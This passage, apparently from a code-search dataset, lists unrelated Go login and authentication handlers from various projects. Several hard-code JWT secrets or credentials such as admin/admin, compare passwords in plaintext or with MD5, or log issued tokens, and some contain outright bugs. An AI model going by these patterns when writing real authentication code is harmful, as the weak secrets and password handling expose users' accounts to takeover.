end_implement\n}", "func (adminrepo *AdminRepo) AdminEmailExist( email string ) error{\n\tfilter := bson.D{{\"email\", email}}\n\treturn adminrepo.DB.Collection( entity.ADMIN ).FindOne(context.TODO(), filter).Err()\n}", "func (h *Handler) Login(w http.ResponseWriter, r *http.Request) {\n\tvar d UserLoginRequest\n\tif err := json.NewDecoder(r.Body).Decode(&d); err != nil {\n\t\trender.BadRequest(w, r, \"invalid json string\")\n\t\treturn\n\t}\n\n\t//Check if email exists\n\tuser, err := h.Client.User.\n\t\tQuery().\n\t\tWhere(usr.Email(d.Email)).\n\t\tOnly(r.Context())\n\tif err != nil {\n\t\tswitch {\n\t\tcase ent.IsNotFound(err):\n\t\t\trender.NotFound(w, r, \"Email Doesn't exists\")\n\t\tcase ent.IsNotSingular(err):\n\t\t\trender.BadRequest(w, r, \"Invalid Email\")\n\t\tdefault:\n\t\t\trender.InternalServerError(w, r, \"Server Error\")\n\t\t}\n\t\treturn\n\t}\n\n\t// Verify the password\n\tif user.Password == d.Password {\n\t\tfmt.Println(\"User Verified. Log In Successful\")\n\t\trender.OK(w, r, user)\n\t\treturn\n\t}\n\trender.Unauthorized(w, r, \"Invalid Email or Password.\")\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\n\tPrintln(\"Endpoint Hit: Login\")\n\tvar response struct {\n\t\tStatus bool\n\t\tMessage string\n\t\tData map[string]interface{}\n\t}\n\t// var response models.JwtResponse\n\t//CEK UDAH ADA YANG LOGIN ATAU BELUM\n\t// session := sessions.Start(w, r)\n\t// if len(session.GetString(\"email\")) != 0 && checkErr(w, r, err) {\n\t// \thttp.Redirect(w, r, \"/\", 302)\n\t// }\n\tjwtSignKey := \"notsosecret\"\n\tappName := \"Halovet\"\n\tvar message string\n\n\t//dapetin informasi dari Basic Auth\n\t// email, password, ok := r.BasicAuth()\n\t// if !ok {\n\t// \tmessage = \"Invalid email or password\"\n\t// \tw.Header().Set(\"Content-Type\", \"application/json\")\n\t// \tw.WriteHeader(200)\n\t// \tresponse.Status = false\n\t// \tresponse.Message = message\n\t// \tjson.NewEncoder(w).Encode(response)\n\t// \treturn\n\t// }\n\t//dapetin informasi dari form\n\temail := r.FormValue(\"email\")\n\tif _, status := ValidateEmail(email); status != true {\n\t\tmessage := \"Format Email Salah atau Kosong\"\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(200)\n\t\tresponse.Status = false\n\t\tresponse.Message = message\n\t\tjson.NewEncoder(w).Encode(response)\n\t\treturn\n\t}\n\tpassword := r.FormValue(\"password\")\n\tif _, status := ValidatePassword(password); status != true {\n\t\tmessage := \"Format Password Salah atau Kosong, Minimal 6 Karakter\"\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(200)\n\t\tresponse.Status = false\n\t\tresponse.Message = message\n\t\tjson.NewEncoder(w).Encode(response)\n\t\treturn\n\t}\n\n\tok, userInfo := mid.AuthenticateUser(email, password)\n\tif !ok {\n\t\tmessage = \"Invalid email or password\"\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(200)\n\t\tresponse.Status = false\n\t\tresponse.Message = message\n\t\tjson.NewEncoder(w).Encode(response)\n\t\treturn\n\t}\n\n\tclaims := models.TheClaims{\n\t\tStandardClaims: jwt.StandardClaims{\n\t\t\tIssuer: appName,\n\t\t\tExpiresAt: time.Now().Add(LoginExpDuration).Unix(),\n\t\t},\n\t\tUser: userInfo,\n\t}\n\n\ttoken := jwt.NewWithClaims(\n\t\tJwtSigningMethod,\n\t\tclaims,\n\t)\n\n\tsignedToken, err := token.SignedString([]byte(jwtSignKey))\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\t//tokennya dijadiin json\n\t// tokenString, _ := json.Marshal(M{ \"token\": signedToken })\n\t// w.Write([]byte(tokenString))\n\tdata := map[string]interface{}{\n\t\t\"jwtToken\": signedToken,\n\t\t\"user\": userInfo,\n\t}\n\n\t//RESPON JSON\n\tmessage = \"Login Succesfully\"\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(200)\n\tresponse.Status = true\n\tresponse.Message = message\n\tresponse.Data = data\n\tjson.NewEncoder(w).Encode(response)\n\n\thttp.SetCookie(w, &http.Cookie{\n\t\tName: \"token\",\n\t\tValue: signedToken,\n\t\tExpires: time.Now().Add(LoginExpDuration),\n\t})\n}", "func (a Admin) Login(user,passwd string) (error, bool) {\n if user == a.Name && passwd == a.Pass {\n return nil, true\n } else {\n return errors.New(\"Wrong login or password\"), false\n }\n}", "func postTokenAuth(s *Setup) func(w http.ResponseWriter, r *http.Request) {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tvar response jSendResponse\n\t\tstatusCode := http.StatusOK\n\t\tresponse.Status = \"fail\"\n\n\t\trequestUser := new(auth.User)\n\t\terr := json.NewDecoder(r.Body).Decode(&requestUser)\n\t\tif err != nil {\n\t\t\tresponse.Data = jSendFailData{\n\t\t\t\tErrorReason: \"request format\",\n\t\t\t\tErrorMessage: `bad request, use format {\"username\":\"username\",\"password\":\"password\"}`,\n\t\t\t}\n\t\t\ts.Logger.Printf(\"bad auth request\")\n\t\t\tstatusCode = http.StatusBadRequest\n\t\t} else {\n\t\t\trequestUser.Email = \"\" // remove after email auth is fully implemented\n\t\t\tsuccess, err := s.AuthService.Authenticate(requestUser)\n\t\t\tswitch err {\n\t\t\tcase nil:\n\t\t\t\tif success {\n\t\t\t\t\t{\n\t\t\t\t\t\tif requestUser.Email != \"\" {\n\t\t\t\t\t\t\t// todo email auth\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\ttokenString, err := s.AuthService.GenerateToken(requestUser.Username)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\ts.Logger.Printf(\"token generation failed because: %v\", err)\n\t\t\t\t\t\tresponse.Status = \"error\"\n\t\t\t\t\t\tresponse.Message = \"server error when authenticating\"\n\t\t\t\t\t\tstatusCode = http.StatusInternalServerError\n\t\t\t\t\t} else {\n\t\t\t\t\t\tresponse.Status = \"success\"\n\t\t\t\t\t\tvar responseData struct {\n\t\t\t\t\t\t\tData string `json:\"token\"`\n\t\t\t\t\t\t}\n\t\t\t\t\t\tresponseData.Data = tokenString\n\t\t\t\t\t\tresponse.Data = responseData\n\t\t\t\t\t\ts.Logger.Printf(\"user %s got token\", requestUser.Username)\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\ts.Logger.Printf(\"unsuccessful authentication attempt on nonexisting user\")\n\t\t\t\t\tresponse.Data = jSendFailData{\n\t\t\t\t\t\tErrorReason: \"credentials\",\n\t\t\t\t\t\tErrorMessage: \"incorrect username or password\",\n\t\t\t\t\t}\n\t\t\t\t\tstatusCode = http.StatusUnauthorized\n\t\t\t\t}\n\t\t\tcase auth.ErrUserNotFound:\n\t\t\t\ts.Logger.Printf(\"unsuccessful authentication attempt\")\n\t\t\t\tresponse.Data = jSendFailData{\n\t\t\t\t\tErrorReason: \"credentials\",\n\t\t\t\t\tErrorMessage: \"incorrect username or password\",\n\t\t\t\t}\n\t\t\t\tstatusCode = http.StatusUnauthorized\n\t\t\tdefault:\n\t\t\t\ts.Logger.Printf(\"auth failed because: %v\", err)\n\t\t\t\tresponse.Status = \"error\"\n\t\t\t\tresponse.Message = \"server error when generating token\"\n\t\t\t\tstatusCode = http.StatusInternalServerError\n\t\t\t}\n\t\t}\n\t\twriteResponseToWriter(response, w, statusCode)\n\t}\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\tsetupResponse(&w, r)\n\tif (*r).Method == \"OPTIONS\" {\n\t\treturn\n\t}\n\tvar dataSource LoginResource\n\tvar token string\n\terr := json.NewDecoder(r.Body).Decode(&dataSource)\n\n\tif err != nil {\n\t\t// err := errors.New(\"Invalid Login Data\")\n\t\tcommon.DisplayAppError(\n\t\t\tw,\n\t\t\terr,\n\t\t\t\"Invalid Login Data\",\n\t\t\t500,\n\t\t)\n\t\treturn\n\t}\n\tloginModel := dataSource.Data\n\tloginUser := models.User{\n\t\tEmail: loginModel.Email,\n\t\tPassword: loginModel.Password,\n\t}\n\tcontext := NewContext()\n\tdefer context.Close()\n\tc := context.DbCollection(\"users\")\n\trepo := &data.UserRepository{c}\n\tif user, err := repo.Login(loginUser); err != nil {\n\t\tcommon.DisplayAppError(\n\t\t\tw,\n\t\t\terr,\n\t\t\t\"Invalid login Credentials\",\n\t\t\t401,\n\t\t)\n\t\treturn\n\t} else { // Login successful\n\t\t// Generate JWT Token\n\t\ttoken, err = common.GenerateJWT(user.Email, \"member\")\n\t\tif err != nil {\n\t\t\tcommon.DisplayAppError(\n\t\t\t\tw,\n\t\t\t\terr,\n\t\t\t\t\"Error while generating the Access Token\",\n\t\t\t\t500,\n\t\t\t)\n\t\t\treturn\n\t\t}\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tuser.HashedPassword = \"\"\n\t\tauthUser := AuthUserModel{\n\t\t\tUser: user,\n\t\t\tToken: token,\n\t\t}\n\t\tj, err := json.Marshal(AuthUserResource{Data: authUser})\n\t\tif err != nil {\n\t\t\tcommon.DisplayAppError(\n\t\t\t\tw,\n\t\t\t\terr,\n\t\t\t\t\"An Unexpected Error Occured\",\n\t\t\t\t500,\n\t\t\t)\n\t\t\treturn\n\t\t}\n\t\tw.WriteHeader(http.StatusOK)\n\t\tw.Write(j)\n\t\thttp.Redirect(w, r, \"/users/logout\", 302)\n\t}\n}", "func LoginUser(u User) {\n err, _ := u.Login(\"admin\", \"admin\")\n\n if err != nil {\n fmt.Println(err.Error())\n }\n}", "func Login(c echo.Context) error {\n\n\tu := new(User)\n\tif err := c.Bind(u); err != nil {\n\t\treturn err\n\t}\n\n\t// Throws unauthorized error\n\tif u.Email != \"[email protected]\" || u.Password != \"qwerty\" {\n\t\treturn echo.ErrUnauthorized\n\t}\n\n\t// Create token\n\ttoken := jwt.New(jwt.SigningMethodHS256)\n\n\t// Set claims\n\tclaims := token.Claims.(jwt.MapClaims)\n\tclaims[\"name\"] = u.Name\n\tclaims[\"admin\"] = true\n\tclaims[\"exp\"] = time.Now().Add(3 * time.Hour).Unix()\n\n\t// Generate encoded token and send it as response.\n\tt, err := token.SignedString([]byte(os.Getenv(\"JWT_SECRET\")))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn c.JSON(http.StatusOK, map[string]string{\n\t\t\"token\": t,\n\t})\n}", "func LoginUser(ctx context.Context, mongoClient *mongo.Client) func(http.ResponseWriter, *http.Request) {\n return func(response http.ResponseWriter, request *http.Request) {\n request.ParseForm()\n response.Header().Set(\"content-type\", \"application/x-www-form-urlencoded\")\n collection := mongoClient.Database(\"go_meals\").Collection(\"users\")\n email := request.FormValue(\"email\")\n password := []byte(request.FormValue(\"password\"))\n\n filter := bson.D{{\"email\", email}}\n var user models.User\n err := collection.FindOne(ctx, filter).Decode(&user)\n if err != nil {\n var errMessage models.Errors\n errMessage.User = \"This user not in database\"\n json.NewEncoder(response).Encode(errMessage)\n } else {\n bcryptErr := bcrypt.CompareHashAndPassword(user.Password, password)\n if bcryptErr != nil {\n var errMessage models.Errors\n errMessage.Password = \"Password email error\"\n json.NewEncoder(response).Encode(errMessage)\n response.WriteHeader(http.StatusUnauthorized)\n } else {\n expirationTime := time.Now().Add(1440 * time.Minute)\n claims := models.Claims{\n \t\tName: user.Name,\n ID: user.ID,\n \t\tStandardClaims: jwt.StandardClaims{\n \t\t\tExpiresAt: expirationTime.Unix(), //so its ms\n \t\t},\n \t}\n token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)\n var jwtKey = []byte(\"my_secret_key\")\n tokenString, err := token.SignedString(jwtKey)\n if err != nil {\n var errMessage models.Errors\n errMessage.Password = \"There was an error signing your token\"\n json.NewEncoder(response).Encode(errMessage)\n response.WriteHeader(http.StatusUnauthorized)\n } else {\n var JOT models.JOT\n JOT.Success = true\n JOT.Token = tokenString\n json.NewEncoder(response).Encode(JOT)\n }\n }\n }\n }\n}", "func (_CrToken *CrTokenSession) Admin() (common.Address, error) {\n\treturn _CrToken.Contract.Admin(&_CrToken.CallOpts)\n}", "func GetOneTouchLoginByEmail(email, name, clientGUID, redirectURL, oneTouchLoginEmailTemplate,\n\twelcomeEmailTemplate string) (OneTouchLoginData, error) {\n\tdata := new(OneTouchLoginData)\n\treq, reqErr := CreateRequest(\"GET\", os.Getenv(\"DOMAIN\") + \"/identity/v2/auth/onetouchlogin/email\", \"\")\n\tif reqErr != nil {\n\t\treturn *data, reqErr\n\t}\n\n\tq := req.URL.Query()\n\tq.Add(\"apikey\", os.Getenv(\"APIKEY\"))\n\tq.Add(\"email\", email)\n\tq.Add(\"name\", name)\n\tq.Add(\"clientguid\", clientGUID)\n\tq.Add(\"onetouchloginemailtemplate\", oneTouchLoginEmailTemplate)\n\tq.Add(\"redirecturl\", redirectURL)\n\tq.Add(\"welcomeemailtemplate\", welcomeEmailTemplate)\n\treq.URL.RawQuery = q.Encode()\n\treq.Header.Add(\"content-Type\", \"application/x-www-form-urlencoded\")\n\n\terr := RunRequest(req, data)\n\treturn *data, err\n}", "func Authentify(w http.ResponseWriter, r *http.Request) {\n\tdecoder := json.NewDecoder(r.Body)\n\n\tvar loginDto models.JWTLoginDTO\n\tif err := decoder.Decode(&loginDto); err != nil {\n\t\tutils.RenderErr(w, r, err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\t// TODO: replace with db checking\n\tif loginDto.Email != \"[email protected]\" || loginDto.Password != \"pwd\" {\n\t\tutils.RenderErr(w, r, \"wrong email or password\", http.StatusUnauthorized)\n\t\treturn\n\t}\n\n\ttoken, _ := utils.GenerateJWTToken([]byte(\"mysupersecret\"), jwt.MapClaims{})\n\tdao := models.JWTLoginDAO{\n\t\tToken: token,\n\t}\n\n\tutils.RenderData(w, r, dao, http.StatusOK)\n\treturn\n}", "func Login(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) {\n\ttokenstring := r.Header.Get(\"Authorization\")\n\tusername, id := utils.GetUsernameByToken(tokenstring, w)\n\tif username != \"error\" {\n\t\tctx := context.WithValue(r.Context(), \"user\", structs.UserToken{\n\t\t\tUsername: username,\n\t\t\tID: id,\n\t\t})\n\t\t//ctx2 := context.WithValue(r.Context(), \"id\", id)\n\t\tnext(w, r.WithContext(ctx))\n\t} else {\n\t\treturn\n\t}\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\terr := json.NewDecoder(r.Body).Decode(&user)\n\tif err != nil {\n\t\tfmt.Fprintf(w, \"Error: %s\\n\", err)\n\t\treturn\n\t}\n\tdatabase := configuration.GetConnection()\n\tdefer database.Close()\n\n\tdatabase.Where(\"email = $1 and password = $2\", user.Email, password).First(&user)\n\tlog.Println(user.ID, password)\n\tif user.ID > 0 {\n\t\tuser.Password = \"\"\n\t\ttoken := commons.GenerateJWT(user)\n\t\tj, err := json.Marshal(models.Token{Token: token})\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error al convertir el token a json: %s\", err)\n\t\t}\n\t\tw.WriteHeader(http.StatusOK)\n\t\tw.Write(j)\n\t}else {\n\t\tm = models.Message{\n\t\t\tMessage: \"Usuario o clave no válido\",\n\t\t\tCode: http.StatusUnauthorized,\n\t\t}\n\t\tcommons.DisplayMessage(w, m)\n\t}\n\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\n\tbody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\tuser := models.User{}\n\terr = json.Unmarshal(body, &user)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\n\tuser.Prepare()\n\terr = user.Validate(\"login\")\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\n\ttoken, err := auth.SignIn(user.Email, user.Password)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\tresponses.JSON(w, http.StatusOK, token)\n}", "func (m *Module) Login(email, password string) (string, bool, error) {\n\temail = strings.ToLower(email)\n\tuserID, hashedPassword, err := m.userStore.Get(email)\n\tif err != nil {\n\t\treturn \"\", false, err\n\t}\n\treturn userID, AuthenticatePassword(password, hashedPassword), nil\n}", "func (c *AuthController) Login(w http.ResponseWriter, r *http.Request) {\n\n\tvar user models.NewUser\n\n\terr := json.NewDecoder(r.Body).Decode(&user)\n\tif err != nil {\n\t\tcommonHTTP.SendJSON(w, r, err, http.StatusBadRequest)\n\t\treturn\n\t}\n\tresult := services.Users.FindUser(&user)\n\ttokenString, err := result.GenerateJWT()\n\tresponse := map[string]string{\n\t\t\"token\": tokenString,\n\t}\n\tcommonHTTP.SendJSON(w, r, response, http.StatusOK)\n}", "func getAccessToken(context context.Context, email string) string {\n\tuserAccessToken := datastore.NewQuery(\"AccessTokens\").Ancestor(\n\t\taccessTokenKey(context, email)).Filter(\"Email =\", email).Limit(1)\n\taTokens := make([]AccessTokens, 0, 1)\n\tuserAccessToken.GetAll(context, &aTokens)\n\tif len(aTokens) > 0 {\n\t\treturn aTokens[0].AccessToken\n\t}\n\treturn \"\"\n}", "func ValidateEmailConfirmation(next http.HandlerFunc) http.HandlerFunc {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {\n\n\t\tkeys, err := req.URL.Query()[\"token\"]\n\n\t\tif !err || len(keys[0]) == 0 {\n\t\t\tjson.NewEncoder(w).Encode(entities.Message{Message: \"Error, no token provided\"})\n\t\t} else {\n\n\t\t\tdecodedToken, tokErr := base64.StdEncoding.DecodeString(keys[0])\n\n\t\t\tif tokErr != nil {\n\t\t\t\tfmt.Println(\"Error decoding\")\n\t\t\t} else {\n\n\t\t\t\ttoken, error := jwt.Parse(string(decodedToken), func(token *jwt.Token) (interface{}, error) {\n\t\t\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"Error occurred\")\n\t\t\t\t\t} else {\n\t\t\t\t\t\treturn []byte(\"secret\"), nil\n\t\t\t\t\t}\n\t\t\t\t})\n\n\t\t\t\tif error != nil {\n\t\t\t\t\tjson.NewEncoder(w).Encode(models.Exception{Message: error.Error()})\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tif token.Valid {\n\t\t\t\t\tcontext.Set(req, \"decoded\", token.Claims)\n\n\t\t\t\t\tnext(w, req)\n\t\t\t\t} else {\n\t\t\t\t\tjson.NewEncoder(w).Encode(models.Exception{Message: \"Invalid authorization token\"})\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t})\n\n}", "func GetLoginFromToken(c *gin.Context) (models.Login, error) {\n\tlogin := models.Login{}\n\tdecodedToken, err := DecodeToken(c.GetHeader(\"Authorization\"), GlobalJWTKey)\n\tfmt.Println(\"GetLoginFromToken -- decodedToken\", decodedToken)\n\tif err != nil {\n\t\treturn login, errors.New(\"GetLoginFromToken - unable to decode token\")\n\t}\n\t// login ID is the compulsary field, so haven't added check for nil\n\tif decodedToken[\"userName\"] == nil || decodedToken[\"userName\"] == \"\" {\n\t\treturn login, errors.New(\"GetLoginFromToken - login id not found\")\n\t}\n\tlogin.UserName = decodedToken[\"userName\"].(string)\n\tlogin.Password = decodedToken[\"password\"].(string)\n\treturn login, nil\n}", "func Login(c *gin.Context) {\n\tphone := c.PostForm(\"phone\")\n\tpassword := c.PostForm(\"password\")\n\n\t//find user\n\tusers, err := userModel.GetUsersByStrKey(\"phone\", phone)\n\tif err != nil {\n\t\tc.JSON(http.StatusInternalServerError, gin.H{\n\t\t\t\"msg\": err.Error(),\n\t\t})\n\t\tlog.ErrorLog.Println(err)\n\t\tc.Error(err)\n\t\treturn\n\t}\n\n\t// if user is unregistered\n\tif len(users) == 0 {\n\n\t\tc.JSON(http.StatusBadRequest, gin.H{\n\t\t\t\"msg\": \"phone is unregistered\",\n\t\t})\n\t\tlog.ErrorLog.Println(\"phone is unregistered\")\n\t\tc.Error(errors.New(\"phone is unregistered\"))\n\t\treturn\n\t}\n\n\tuser := users[0]\n\t// encrypt password with MD5\n\tpassword = util.MD5(password)\n\t// if password error\n\tif password != user.Password {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\n\t\t\t\"msg\": \"phone or password is incorrect\",\n\t\t})\n\t\tlog.ErrorLog.Println(\"phone or password is incorrect\")\n\t\tc.Error(errors.New(\"phone or password is incorrect\"))\n\t\treturn\n\t}\n\n\tsession := sessions.Default(c)\n\tsession.Set(\"userId\", user.Id)\n\terr = session.Save()\n\tif err != nil {\n\t\tlog.ErrorLog.Println(err)\n\t\tc.JSON(http.StatusInternalServerError, gin.H{\n\t\t\t\"msg\": \"fail to generate session token\",\n\t\t})\n\t\tlog.ErrorLog.Println(\"fail to generate session token\")\n\t\tc.Error(errors.New(\"fail to generate session token\"))\n\t} else {\n\t\tuserJson, err := util.StructToJsonStr(user)\n\t\tif err != nil {\n\t\t\tc.JSON(http.StatusInternalServerError, gin.H{\n\t\t\t\t\"msg\": err.Error(),\n\t\t\t})\n\t\t\tlog.ErrorLog.Println(err)\n\t\t\tc.Error(err)\n\t\t\treturn\n\t\t}\n\t\tc.JSON(http.StatusOK, gin.H{\n\t\t\t\"msg\": \"successfully login\",\n\t\t\t\"user\": userJson,\n\t\t})\n\t\tlog.InfoLog.Println(\"successfully login\")\n\t}\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Add(\"content-type\", \"application/json\")\n\n\tvar u models.User\n\n\terr := json.NewDecoder(r.Body).Decode(&u)\n\tif err != nil {\n\t\thttp.Error(w, \"Invalid User or Password\"+err.Error(), 400)\n\t\treturn\n\t}\n\tif len(u.Email) == 0 {\n\t\thttp.Error(w, \"Email is required\", 400)\n\t\treturn\n\t}\n\tobj, exist := db.TrytoLogin(u.Email, u.Password)\n\tif exist == false {\n\t\thttp.Error(w, \"Invalid user or password\", 400)\n\t\treturn\n\t}\n\n\tjwtkey, err := jwt.GenerateJwt(obj)\n\tif err != nil {\n\t\thttp.Error(w, \"Error ocurred while try to generate the token\"+err.Error(), 400)\n\t}\n\n\tres := models.LoginResponse{\n\t\tToken: jwtkey,\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusCreated)\n\t// Setting the body response\n\tjson.NewEncoder(w).Encode(res)\n\n\t// Saving a cookie - Optional\n\texpirationTime := time.Now().Add(24 * time.Hour)\n\thttp.SetCookie(w, &http.Cookie{\n\t\tName: \"token\",\n\t\tValue: jwtkey,\n\t\tExpires: expirationTime,\n\t})\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Add(\"Content-Type\", \"application/json\")\n\n\tvar t models.User\n\n\terr := json.NewDecoder(r.Body).Decode(&t)\n\n\tif err != nil {\n\t\thttp.Error(w, \"Usuario o contraseña invalidos \"+err.Error(), 400)\n\t\treturn\n\t}\n\n\tif len(t.Email) == 0 {\n\t\thttp.Error(w, \"El email del usuario es requerido\", 400)\n\t\treturn\n\t}\n\tdocument, exists := db.CheckLogin(t.Email, t.Password)\n\n\tif !exists {\n\t\thttp.Error(w, \"Usuario y/o contraseña invalidos \"+err.Error(), 400)\n\t\treturn\n\t}\n\n\tjwtKey, err := jwt.GenerateJWT(document)\n\tif err != nil {\n\t\thttp.Error(w, \"Ocurrio un error al intentar generar el Token correspondiente \"+err.Error(), 400)\n\t\treturn\n\t}\n\n\tresp := models.LoginResponse{\n\t\tToken: jwtKey,\n\t}\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusCreated)\n\tjson.NewEncoder(w).Encode(resp)\n\n\texpirationTime := time.Now().Add(24 * time.Hour)\n\thttp.SetCookie(w, &http.Cookie{\n\t\tName: \"token\",\n\t\tValue: jwtKey,\n\t\tExpires: expirationTime,\n\t})\n}", "func LoginUser(w http.ResponseWriter, r *http.Request) {\r\n\tdefer r.Body.Close()\r\n\tvar unauthUser model.User\r\n\r\n\tif err := json.NewDecoder(r.Body).Decode(&unauthUser); err != nil {\r\n\t\tlog.Println(err)\r\n\t\tu.RespondWithError(w, http.StatusBadRequest, \"Invalid request payload\")\r\n\t\treturn\r\n\t}\r\n\r\n\tuser, err := dao.DBConn.FindUserByEmail(unauthUser.Email)\r\n\tif err != nil {\r\n\t\tlog.Println(err)\r\n\t\tu.RespondWithError(w, http.StatusBadRequest, \"Invalid login credentials. Please try again\")\r\n\t\treturn\r\n\t}\r\n\r\n\terr = bcrypt.CompareHashAndPassword([]byte(user.Password), []byte(unauthUser.Password))\r\n\tif err != nil && err == bcrypt.ErrMismatchedHashAndPassword {\r\n\t\tlog.Println(err)\r\n\t\tu.RespondWithError(w, http.StatusBadRequest, \"Invalid login credentials. Please try again\")\r\n\t\treturn\r\n\t}\r\n\r\n\tuser.Token = model.GenerateToken(user.Email)\r\n\r\n\t// Delete password before response\r\n\tuser.Password = \"\"\r\n\r\n\tu.RespondWithJSON(w, http.StatusOK, user)\r\n}", "func (f *FOneDNS) Login() (token string, err error) {\n\n\tp := struct {\n\t\tUserName string `json:\"username\"`\n\t\tPassword string `json:\"password\"`\n\t}{\n\t\tUserName: f.username,\n\t\tPassword: f.password,\n\t}\n\n\tvar tmp struct {\n\t\tToken string `json:\"token\"`\n\t}\n\n\terr = f.httpDo(\"POST\", \"/user/login\", p, &tmp)\n\tif err != nil {\n\t\tutils.Error(\"[fone] login error:\", err)\n\t\treturn\n\t}\n\n\tc.Set(FONETokenKey, tmp.Token, 50*time.Minute)\n\n\tutils.Infof(\"[fone] login token ==> %s\", tmp.Token)\n\tfmt.Println(\"[login token] =>\", tmp.Token)\n\n\treturn tmp.Token, nil\n}", "func login(master string, loginObject []byte, client *http.Client) (authToken string, err error) {\n\n\t// Build request\n\turl := \"https://\" + master + \"/acs/api/v1/auth/login\"\n\n\treq, err := http.NewRequest(\"POST\", url, bytes.NewBuffer(loginObject))\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\t// Make request\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer resp.Body.Close()\n\n\t// Read response\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Todo better error handling (after read response, cause will eventually use body)\n\tif resp.StatusCode != http.StatusOK {\n\t\treturn \"\", errors.New(\"Unable to login (Invalid credentials?)\")\n\t}\n\tauthToken, err = parseLoginResponse(body)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn authToken, nil\n}", "func Login(ctx *gin.Context) {\n\n\tDB := common.GetDB()\n\n\t//获取数据\n\ttelephone := ctx.PostForm(\"tel\")\n\tpassword := ctx.PostForm(\"password\")\n\n\t//判断数据\n\tif len(telephone) != 11 {\n\t\tresponse.Response(ctx, http.StatusUnprocessableEntity, 4221, gin.H{}, \"手机号必须为11位\")\n\t\treturn\n\t}\n\n\tif len(password) < 6 {\n\t\tresponse.Response(ctx, http.StatusUnprocessableEntity, 4222, gin.H{}, \"密码需大于6位\")\n\n\t\treturn\n\t}\n\n\t//处理数据\n\n\tvar user model.User\n\tDB.First(&user, \"telephone = ?\", telephone)\n\tif user.ID == 0 {\n\t\tresponse.Response(ctx, http.StatusUnprocessableEntity, 4225, gin.H{}, \"用户不存在\")\n\n\t\treturn\n\t}\n\n\tif err := bcrypt.CompareHashAndPassword([]byte(user.Password), []byte(password)); err != nil {\n\t\tresponse.Response(ctx, http.StatusUnprocessableEntity, 4226, gin.H{}, \"密码错误\")\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\ttoken, err := common.ReleaseToken(user)\n\n\tif err != nil {\n\t\tresponse.Response(ctx, http.StatusInternalServerError, 5001, gin.H{}, \"密码解析错误\")\n\t\tlog.Fatal(err)\n\t\treturn\n\t}\n\n\tresponse.Success(ctx, gin.H{\"token\": token}, \"ok\")\n\n}", "func (u *UserController) LoginVerify() (result s.ReturnStructs) {\n\tvar userInfo s.Userinfo\n\tvar userPassword string\n\tvar token string\n\terr := json.Unmarshal(u.Ctx.Input.RequestBody, &userInfo)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdb := common.Connectdatabase()\n\tsql := \"SELECT UserPassword FROM usertable WHERE UserName = ?\"\n\trows, err := db.Query(sql, userInfo.UserName)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\trows.Scan(userPassword)\n\tif userPassword == userInfo.UserPassword {\n\t\ttimestamp := time.Unix(time.Now().Unix(), 0)\n\t\ttime := timestamp.Format(\"2006-01-02 03:04:05 PM\")\n\t\ttoken = common.GenerateTokenInfo(userInfo.UserName,\n\t\t\tuserInfo.UserPassword, time)\n\t}\n\t//add token into redis\n\trc := common.RedisClient.Get()\n\tdefer rc.Close()\n\tres, err := rc.Do(\"SET\", userInfo.UserName, token, \"EX\", \"604800\")\n\tfmt.Printf(\"%x\", res)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tresult.Insert(0, \"\", token)\n\treturn result\n}", "func (u *UserController) Login(c *gin.Context) {\n\tvar data forms.LoginUserCommand\n\n\t// Bind the request body data to var data and check if all details are provided\n\tif c.BindJSON(&data) != nil {\n\t\tc.JSON(406, gin.H{\"message\": \"Provide required details\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tresult, err := userModel.GetUserByEmail(data.Email)\n\n\tif result.Email == \"\" {\n\t\tc.JSON(404, gin.H{\"message\": \"User account was not 